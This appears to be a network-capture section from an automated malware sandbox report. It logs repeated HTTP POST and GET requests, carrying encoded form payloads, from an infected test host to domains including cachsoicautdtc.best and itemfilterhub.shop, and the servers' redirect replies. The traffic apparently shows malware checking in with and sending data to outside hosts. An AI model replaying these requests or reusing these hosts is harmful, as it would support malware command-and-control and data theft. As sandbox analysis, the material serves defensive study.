                                                Data Raw: 69 6a 36 30 4d 74 59 3d 73 52 4f 64 78 5a 73 2f 43 64 46 55 5a 4c 47 52 55 37 41 54 33 49 73 59 75 2b 66 74 77 56 57 75 6c 52 57 61 46 62 47 4e 33 42 6b 63 4d 6d 47 30 32 30 39 4a 2f 37 79 4e 57 37 46 6f 58 4e 42 56 36 51 30 6d 4c 39 57 67 64 77 2b 56 4c 33 32 65 49 4d 71 48 38 4b 72 38 4e 65 65 31 58 48 59 32 4a 6d 79 67 6c 32 59 43 4f 50 4a 76 63 7a 71 72 6f 76 71 64 44 6d 5a 73 35 56 61 6d 4e 31 38 45 39 39 51 34 37 55 48 44 56 72 4b 44 53 4d 5a 49 31 55 51 58 63 50 6b 72 52 74 58 6a 66 2b 51 42 65 6b 44 75 71 71 6a 58 46 42 62 4b 2b 43 61 32 36 39 6b 52 45 65 30 53 4c 45 41 4d 49 45 43 45 36 41 3d 3d
                                                Data Ascii: ij60MtY=sROdxZs/CdFUZLGRU7AT3IsYu+ftwVWulRWaFbGN3BkcMmG0209J/7yNW7FoXNBV6Q0mL9Wgdw+VL32eIMqH8Kr8Nee1XHY2Jmygl2YCOPJvczqrovqdDmZs5VamN18E99Q47UHDVrKDSMZI1UQXcPkrRtXjf+QBekDuqqjXFBbK+Ca269kREe0SLEAMIECE6A==
                                                Aug 27, 2024 08:04:03.266074896 CEST865INHTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 06:04:03 GMT
                                                Content-Type: text/html
                                                Content-Length: 167
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Tue, 27 Aug 2024 07:04:03 GMT
                                                Location: https://www.cachsoicautdtc.best/fp5q/
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z69u57Tl%2Fw%2BuQAmY4Ey3FIfcoLICdlCg2kMKa8TiHoYMyB5lc7%2BmCAghYICgVTsQxVafTDW8WQI8jYAGcXjHWPmxdhzUv7jhsN771yojX5fFiaeeNI3tHTi4dhrLEkhwEnTI7y28a%2FCflw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Vary: Accept-Encoding
                                                Server: cloudflare
                                                CF-RAY: 8b99dca7facbc936-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                67192.168.11.2049909172.67.191.24180
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:04:05.782881975 CEST1175OUTPOST /fp5q/ HTTP/1.1
                                                Host: www.cachsoicautdtc.best
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cachsoicautdtc.best
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cachsoicautdtc.best/fp5q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 73 52 4f 64 78 5a 73 2f 43 64 46 55 59 71 32 52 58 61 41 54 78 6f 73 5a 77 75 66 74 2b 31 57 71 6c 52 61 61 46 66 65 64 33 54 77 63 4d 44 69 30 33 31 39 4a 36 37 79 4e 65 62 46 68 4b 64 42 65 36 51 34 41 4c 39 71 67 64 77 71 56 4c 41 32 65 4f 38 71 45 30 71 71 4f 4b 65 65 32 41 58 59 38 4a 6d 2b 53 6c 30 6b 43 4f 38 4e 76 64 78 53 72 73 37 2b 65 56 32 5a 71 6f 31 61 6c 57 6c 38 65 39 39 55 4b 37 57 58 35 57 59 57 44 53 73 35 49 30 55 51 55 48 76 6b 67 59 4e 57 74 61 66 52 6b 66 48 33 36 6b 73 37 4b 45 6a 6a 6c 31 68 75 30 7a 75 51 4b 53 72 38 77 4b 58 68 67 48 58 48 33 74 4e 6c 7a 6e 61 34 4b 32 54 6b 78 66 51 57 2f 6e 69 2f 65 32 48 4a 45 79 2b 79 53 6f 52 75 2f 44 38 6a 54 75 34 65 75 33 48 75 35 68 7a 6d 57 58 67 36 6b 38 30 55 52 63 6e 59 64 44 65 71 56 38 46 42 6e 50 74 33 68 78 7a 76 55 65 2f 37 76 30 6e 52 33 34 70 71 42 49 31 77 33 70 76 4b 62 2b 36 74 62 7a 55 77 77 42 35 61 39 47 77 4e 32 42 6d 76 6c 78 68 54 4f 32 49 54 41 42 4f 5a 4e 79 4d 6e 2b 42 43 6e 33 6d 75 [TRUNCATED]
                                                Data Ascii: ij60MtY=sROdxZs/CdFUYq2RXaATxosZwuft+1WqlRaaFfed3TwcMDi0319J67yNebFhKdBe6Q4AL9qgdwqVLA2eO8qE0qqOKee2AXY8Jm+Sl0kCO8NvdxSrs7+eV2Zqo1alWl8e99UK7WX5WYWDSs5I0UQUHvkgYNWtafRkfH36ks7KEjjl1hu0zuQKSr8wKXhgHXH3tNlzna4K2TkxfQW/ni/e2HJEy+ySoRu/D8jTu4eu3Hu5hzmWXg6k80URcnYdDeqV8FBnPt3hxzvUe/7v0nR34pqBI1w3pvKb+6tbzUwwB5a9GwN2BmvlxhTO2ITABOZNyMn+BCn3muKjXLca6BuBA3fcr1XjznpJsD2WBQZzH+QMReya0qQxk9X7gzME43XF+e8CEl2AV6vFzLy2CKywjt/+RKuJuvE+wuWvt1Hw7ejkGGwFQdA1uHI8JVyZzUhYGjb+JCl9WUKBP+7wGV4JZuH0r8fCp5X9dKTUnqhDrx8hf7GLVQiw0dhr0gr9lAPzeIVynpIZXo8+aFkhMpcOSjQ=
                                                Aug 27, 2024 08:04:05.899171114 CEST865INHTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 06:04:05 GMT
                                                Content-Type: text/html
                                                Content-Length: 167
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Tue, 27 Aug 2024 07:04:05 GMT
                                                Location: https://www.cachsoicautdtc.best/fp5q/
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ke%2FHgq5zfq2l7hV5aB3jgi3Y7NMUaenBUu3u0kiCpWMX0HLTwf3GiJdz6EZ1BQrC%2F4MPwCgHNgcoTxRWuwa9%2FLNIi0hdyyXwZui32xhRD1W86xwQtwaCtK%2FSt2o205ngJPKVCVcDzfirUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Vary: Accept-Encoding
                                                Server: cloudflare
                                                CF-RAY: 8b99dcb87e1ac930-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                68192.168.11.2049910172.67.191.24180
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:04:08.425949097 CEST2578OUTPOST /fp5q/ HTTP/1.1
                                                Host: www.cachsoicautdtc.best
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cachsoicautdtc.best
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cachsoicautdtc.best/fp5q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 73 52 4f 64 78 5a 73 2f 43 64 46 55 59 71 32 52 58 61 41 54 78 6f 73 5a 77 75 66 74 2b 31 57 71 6c 52 61 61 46 66 65 64 33 53 49 63 50 77 61 30 33 57 6c 4a 35 37 79 4e 55 37 46 73 4b 64 42 35 36 55 55 45 4c 39 6d 57 64 79 53 56 4b 54 2b 65 4f 4f 79 45 68 61 72 70 55 4f 65 30 58 48 59 53 4a 6d 7a 54 6c 30 77 34 4f 50 52 76 63 78 69 72 70 4a 57 64 57 6d 5a 73 6f 31 61 70 41 56 38 38 39 39 59 61 37 57 62 35 57 62 79 44 44 50 42 49 32 44 6b 55 64 50 6b 6e 58 74 57 32 4d 76 52 4e 66 48 6a 41 6b 73 37 38 45 69 58 6c 31 6a 6d 30 79 76 51 4a 54 4c 38 77 44 33 68 6a 4e 48 62 7a 74 4d 4e 72 6e 62 63 4b 32 51 6b 78 5a 41 57 2f 73 6e 54 52 6d 33 4a 43 6b 4f 79 4a 73 52 69 4a 44 2f 66 6d 75 36 53 75 32 33 4b 35 67 43 6d 57 51 46 57 6b 2b 55 55 58 42 58 59 4b 49 2b 71 4a 38 46 78 52 50 73 62 75 78 31 76 55 59 65 62 76 69 32 52 30 2b 4a 71 48 52 46 77 75 74 76 48 61 2b 36 64 48 7a 55 78 39 42 34 65 39 47 44 46 32 43 6e 76 69 32 78 54 56 35 6f 54 4f 4c 75 6c 48 79 4d 72 6d 42 44 75 6f 6d 73 [TRUNCATED]
                                                Data Ascii: ij60MtY=sROdxZs/CdFUYq2RXaATxosZwuft+1WqlRaaFfed3SIcPwa03WlJ57yNU7FsKdB56UUEL9mWdySVKT+eOOyEharpUOe0XHYSJmzTl0w4OPRvcxirpJWdWmZso1apAV8899Ya7Wb5WbyDDPBI2DkUdPknXtW2MvRNfHjAks78EiXl1jm0yvQJTL8wD3hjNHbztMNrnbcK2QkxZAW/snTRm3JCkOyJsRiJD/fmu6Su23K5gCmWQFWk+UUXBXYKI+qJ8FxRPsbux1vUYebvi2R0+JqHRFwutvHa+6dHzUx9B4e9GDF2Cnvi2xTV5oTOLulHyMrmBDuomsmjWrca8iGGZXfhgVXx8HpnsDygBV5FHOsMfOiajqQ+idX/pTMO83XF+exlElKAVI/Fy7i2Hbywht/8RKucuv47wueBt1Wl7cPkGUIFRpU0lnI9NVzZ508QGi32JCUIWkmBO+rwCV4KP+Hz8MfYt5bpdKPqnqUEryshPO6RGUTvvL53/grakBjjRq8J2aoxeMY6aFxsXthKEn2CYmQNVho+eupBW/PVWLaXYkHGcW5BQJqvhoF/jASUG14xRJESd7vLHrbN03HCy6oM/UT21J9Pzs0ItP83e0qCFl+xbrXCdi/MOF4u9EWnyAPyjySwg0kibQ3K9QS7MmIOGP/LaOAza4RQwlajvpk2H2cjfh9MxG4tsYIejRe0UHBt3oG4KEqeQ8qB2jGtsKux1yXm7CqmJppY9cwfwhKLvlHf5xGDQXyy+LC0Cl7yYMedYCeXY/OXl0D046JeLYf/iXKLm7pJJHudPuKFfxWFe8IQFcASJqTsVWq7vfjA0pd+VPteldpEhmNG3IX2yGEHR4xPgVE7m5fxNiqVXOAdr3tHfKFSVy5scsLNgCtCdZ9OOkH2gpOM5LKqJUmovMnKPRqfJbpPYl1JRcUaF8XWKT2+Yru9ctMNMyhVFjzDGCbnTmDk/nnFZR1XzPDP7aBPfPoHfFtKZMSsbsuAxWJX [TRUNCATED]
                                                Aug 27, 2024 08:04:08.426000118 CEST7734OUTData Raw: 4c 49 55 43 45 34 31 45 67 58 4f 67 49 59 59 4b 6e 37 32 32 66 75 30 63 6e 68 31 72 57 68 70 69 67 68 74 67 75 50 70 4c 52 4e 51 76 71 64 4a 4b 64 6b 48 41 53 4a 76 79 39 6a 6c 55 65 4a 32 65 6e 62 68 33 44 6e 79 57 32 75 46 6a 6d 31 78 47 37 37
                                                Data Ascii: LIUCE41EgXOgIYYKn722fu0cnh1rWhpightguPpLRNQvqdJKdkHASJvy9jlUeJ2enbh3DnyW2uFjm1xG77O+NdCsiqgYlo4502REh3/1MyGvHdXICtWQJj8XS5YGhRnyBb/g3pzi1TFoPA6LrwFN7bav9H0lmgyLDY/LuUvkGldiq8WXNbwn05G5ZyasqnBdzVIXM5ADIZLiU2QrGiE0zXH18fjtV/k4XeGVTlE9pP/njGJC22R
                                                Aug 27, 2024 08:04:08.426045895 CEST2578OUTData Raw: 68 58 43 6d 79 2f 33 6c 70 55 62 37 52 6b 78 64 50 34 6c 67 30 47 74 57 63 51 4f 50 32 31 33 56 56 2f 39 32 34 4b 55 4b 62 55 59 63 56 69 6d 67 49 72 54 4f 36 39 6c 48 34 37 46 51 62 4f 52 42 68 6f 4d 62 57 52 69 46 72 63 4b 67 33 36 51 71 67 6f
                                                Data Ascii: hXCmy/3lpUb7RkxdP4lg0GtWcQOP213VV/924KUKbUYcVimgIrTO69lH47FQbORBhoMbWRiFrcKg36QqgotCcNME1flBy75r1T+Z7ZmB663ty6UL/t3oadZK2HYAXKcqVzn1sRys4wTPkLHR8U1stP1Kfvc6L0ygAicz4iNkOx46DgetPoePBEnOu6xsL4c7/WeOLFL9m4zmZCP2DYkZ+H9S13K9KyRkZzgnBssvnp8fXKMS35E
                                                Aug 27, 2024 08:04:08.526913881 CEST2578OUTData Raw: 63 53 6f 77 2b 56 74 53 75 51 72 56 47 65 46 2b 6e 32 79 78 38 39 36 57 64 64 56 67 73 76 77 6f 33 5a 75 36 46 47 6e 66 76 71 74 31 4d 55 7a 30 2b 6c 65 6b 54 50 59 49 56 6a 7a 6b 37 38 74 55 72 70 32 57 4b 76 6d 64 57 4a 30 33 6f 4a 4a 46 73 45
                                                Data Ascii: cSow+VtSuQrVGeF+n2yx896WddVgsvwo3Zu6FGnfvqt1MUz0+lekTPYIVjzk78tUrp2WKvmdWJ03oJJFsE/lbGBSScZBZbnadenmGtEpz0KnmL5szzSMcXOmzeOO4HwVSL0KwD9EPruaqOEDHmvR99CcSouFEi1aSpLIh2fm4M4oufviDvfhZvIQgnyQyXaPiGuUdOh2ZPypZn3QAvJS397VVlhE13B9vKCmI+aci/2FQRPwaoU
                                                Aug 27, 2024 08:04:08.526966095 CEST6445OUTData Raw: 4e 53 53 74 73 43 74 6c 66 78 34 4f 38 72 53 4f 77 5a 31 6e 6c 66 72 78 37 46 59 69 7a 38 63 57 57 36 6a 57 32 74 2f 7a 62 6a 4e 4f 69 35 45 6e 68 33 61 41 79 66 32 46 42 57 43 43 4e 7a 44 67 50 41 63 45 77 58 42 4b 76 36 78 37 6a 61 43 78 31 58
                                                Data Ascii: NSStsCtlfx4O8rSOwZ1nlfrx7FYiz8cWW6jW2t/zbjNOi5Enh3aAyf2FBWCCNzDgPAcEwXBKv6x7jaCx1Xm/+CMFfAjvihkrr0YV4Xqnqti1ChpGuFKdhVl5xVtp7sbJ/FGcyVxvLJWktAJb3QFEfb4BrMwyQ9i/HZl2mfgD85dgJ/hmjmJxcJ2sqp1YMbh2g4TIJPNEC2S/ti2sHvU0/Ejx70OJJEDwxP73sgdyRm8ARx2+BqM
                                                Aug 27, 2024 08:04:08.527012110 CEST1289OUTData Raw: 46 55 51 4f 44 58 72 6d 6c 6d 70 33 4a 59 66 6c 34 5a 6b 39 6f 72 41 38 4c 75 41 58 42 2b 63 41 69 41 42 53 33 5a 6a 59 56 65 59 35 73 70 56 44 6b 42 42 68 4a 70 4a 33 34 65 48 56 49 4c 51 31 61 64 77 67 6c 6f 45 64 39 50 6f 65 66 36 72 52 64 65
                                                Data Ascii: FUQODXrmlmp3JYfl4Zk9orA8LuAXB+cAiABS3ZjYVeY5spVDkBBhJpJ34eHVILQ1adwgloEd9Poef6rRde/fcDVHT8GRCS9Q5JrZsjVAinrj88zHOndw3PP60VfsicFcmQA1Bvp5Pmu6vmJrShZw7tocsNXo7ZwooV1/i4+LBdWKG1RvjXra2XqKmeqJyK3wQP+m1GHbqdf6f1saLGIw+ABuAbIysVBxwYYsZ4mCKq7MyrrLYgD
                                                Aug 27, 2024 08:04:08.527184010 CEST5156OUTData Raw: 5a 67 4c 62 6d 44 46 64 6d 7a 4a 42 64 73 35 67 43 56 53 37 50 4f 4f 2b 49 44 59 5a 7a 4d 47 52 61 4d 59 41 67 37 61 72 48 57 67 56 53 4b 64 48 6b 42 62 37 66 4a 4e 6e 42 38 72 51 4b 38 4f 51 37 58 36 4c 6b 4e 6e 45 67 41 59 65 72 4e 77 67 66 48
                                                Data Ascii: ZgLbmDFdmzJBds5gCVS7POO+IDYZzMGRaMYAg7arHWgVSKdHkBb7fJNnB8rQK8OQ7X6LkNnEgAYerNwgfHw5vCH1KA+55pO0P5Y8Il4W7/ZuoKpWrF4L6Jl2cDw4N+5BUDeQAc29i4YN5x6hVHaOeaHnlf1TWqVI4bL7gGyVCSYQLVNBehq9+eBxRL0eJmmEf1/+e7PP7QqhqQudPWIr+m5o+n/akYKQf2tSGKiZaElYWalMXLs
                                                Aug 27, 2024 08:04:08.527352095 CEST1289OUTData Raw: 76 6e 57 69 45 72 74 4c 4b 4c 38 4f 2b 32 63 4d 6f 6e 33 42 43 36 70 75 36 32 43 2f 5a 6f 72 41 4d 35 33 43 6a 43 66 5a 4a 77 66 48 58 32 30 2b 4e 65 35 69 47 30 50 65 30 72 36 37 50 44 4c 77 6c 4d 2b 31 62 73 38 46 5a 6d 58 6f 48 42 61 30 49 33
                                                Data Ascii: vnWiErtLKL8O+2cMon3BC6pu62C/ZorAM53CjCfZJwfHX20+Ne5iG0Pe0r67PDLwlM+1bs8FZmXoHBa0I31dnq7ATWy/IXx+p4Kk6Zn27BUZjc00Ocf/ND1X8OUi12cBUUgjnwm0q9kF1RaUZjIfXR9ZV7jd23uaJiHDnYkFgj/Hl2OgMjNAFKgG5Hc7DCAVoIoJMKvtc+zO42b+uLJSM9wk1rP6yIXRUU7MQVpB0S4eNXXoazu
                                                Aug 27, 2024 08:04:08.527439117 CEST3867OUTData Raw: 36 43 4e 32 64 32 61 65 34 4d 58 45 48 62 35 53 37 6d 6c 59 4b 70 75 49 51 67 6f 42 4c 42 44 4f 64 45 30 31 6e 31 6f 72 6b 6d 67 64 6d 48 6e 75 78 6e 30 41 69 57 79 66 4b 59 7a 77 57 66 58 59 33 2f 46 56 50 4d 70 75 62 41 45 50 52 6a 39 38 2b 4b
                                                Data Ascii: 6CN2d2ae4MXEHb5S7mlYKpuIQgoBLBDOdE01n1orkmgdmHnuxn0AiWyfKYzwWfXY3/FVPMpubAEPRj98+KpKQLen/7LS/2BlmTBcZ2KYQ8MEy+++b3C48RY4Cdxg2N5oqv9ff7xaBU/0XY6Ie1jFGLpyL+vdKTFd75yytwbQPvCrM59lVV/i5QChPjNiJ1riQ7ABmafqYemHeeMTnVqtmRWgnMZbmA4nuxj7WcpfslXUiwmzK73
                                                Aug 27, 2024 08:04:08.527632952 CEST5156OUTData Raw: 4a 35 6a 6c 43 78 59 68 4b 77 69 6e 50 41 56 69 56 2f 76 36 75 57 42 4a 49 51 75 6e 58 4c 44 58 78 4e 4e 43 4d 46 39 4b 78 56 4c 41 5a 5a 2f 2b 61 66 64 54 42 49 53 42 71 71 69 31 33 47 66 57 43 35 73 42 61 59 75 51 6d 6d 65 78 72 63 35 2b 49 4d
                                                Data Ascii: J5jlCxYhKwinPAViV/v6uWBJIQunXLDXxNNCMF9KxVLAZZ/+afdTBISBqqi13GfWC5sBaYuQmmexrc5+IM0if1AovmVHjt3jxntLu8tHXaKbzHEfHiq1Q/mYoxXf+zRB/yGNhK5MH7NU4FZ3kj1XEfYXmSC6H6IC2QeGopgpwtRDf0IsNFFTmVpVZF3WnlrKbZnilP32Vkn/wiL3dZ7tQE9o9y4EKQR/Vxc2/YhpFEVycmnphfq
                                                Aug 27, 2024 08:04:08.544146061 CEST869INHTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 06:04:08 GMT
                                                Content-Type: text/html
                                                Content-Length: 167
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Tue, 27 Aug 2024 07:04:08 GMT
                                                Location: https://www.cachsoicautdtc.best/fp5q/
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rYa4dAEq3NpB4%2BPWp2NWEKafRfqmEu%2B0nQn%2BxcfeurmZIGcK7HH9hvlyazVA%2BP6moIVTy5efVQVKHUN13s9LyfwF8%2FB34kiC6%2BdVDhCVy5jjHJxy3FbsxDMUgLjEiQlOytnQvKI6mdbaqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Vary: Accept-Encoding
                                                Server: cloudflare
                                                CF-RAY: 8b99dcc8fec05aed-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                69192.168.11.2049911172.67.191.24180
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:04:11.060709953 CEST553OUTGET /fp5q/?ij60MtY=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&wXB=brv4Erb HTTP/1.1
                                                Host: www.cachsoicautdtc.best
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:04:11.175339937 CEST989INHTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 06:04:11 GMT
                                                Content-Type: text/html
                                                Content-Length: 167
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Tue, 27 Aug 2024 07:04:11 GMT
                                                Location: https://www.cachsoicautdtc.best/fp5q/?ij60MtY=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&wXB=brv4Erb
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kTzVhj1f0Z7BgVkxLl%2FJhVP1YIDGGfPUoJzxdAzJ%2Fj2cp%2BUS39b3HfeI%2FiDGJRBzcdvfW%2BGhISWhatQzP9nlNz9RUMaie0qR40M2jYSvdmtG5jW%2BJO6MYy8xDRLHgWwNkn8%2BGDJUdOFE1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99dcd979680668-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                70192.168.11.2049912172.67.166.14580
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:04:16.299103022 CEST832OUTPOST /p1v4/ HTTP/1.1
                                                Host: www.itemfilterhub.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.itemfilterhub.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.itemfilterhub.shop/p1v4/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 61 55 66 50 66 54 68 39 4b 36 6c 49 34 79 58 63 43 43 36 43 46 6a 6c 33 79 42 2b 62 4c 31 71 66 4d 6c 59 6e 4a 72 37 6b 6c 31 4d 47 76 5a 6f 2f 4b 7a 33 62 4e 73 6d 6b 36 6c 43 33 70 2f 4c 74 41 54 69 46 73 38 4d 6b 73 4b 7a 58 72 77 67 56 58 61 48 50 34 32 45 58 4e 5a 6d 48 34 4e 2f 7a 31 53 55 70 52 41 75 4e 65 69 6a 75 67 6c 37 42 58 6b 79 64 59 57 73 4a 72 46 46 7a 64 64 54 30 42 59 7a 66 4b 2f 47 63 53 70 36 4e 72 64 66 5a 73 4f 31 2b 4a 67 65 6a 2f 6f 72 4f 62 32 57 44 32 2f 55 31 7a 30 56 6a 64 53 51 4e 63 32 45 78 75 38 39 46 75 2f 62 59 48 65 53 58 36 78 4b 64 77 41 3d 3d
                                                Data Ascii: ij60MtY=aUfPfTh9K6lI4yXcCC6CFjl3yB+bL1qfMlYnJr7kl1MGvZo/Kz3bNsmk6lC3p/LtATiFs8MksKzXrwgVXaHP42EXNZmH4N/z1SUpRAuNeijugl7BXkydYWsJrFFzddT0BYzfK/GcSp6NrdfZsO1+Jgej/orOb2WD2/U1z0VjdSQNc2Exu89Fu/bYHeSX6xKdwA==
                                                Aug 27, 2024 08:04:16.565432072 CEST748INHTTP/1.1 404
                                                Date: Tue, 27 Aug 2024 06:04:16 GMT
                                                Content-Type: text/html;charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
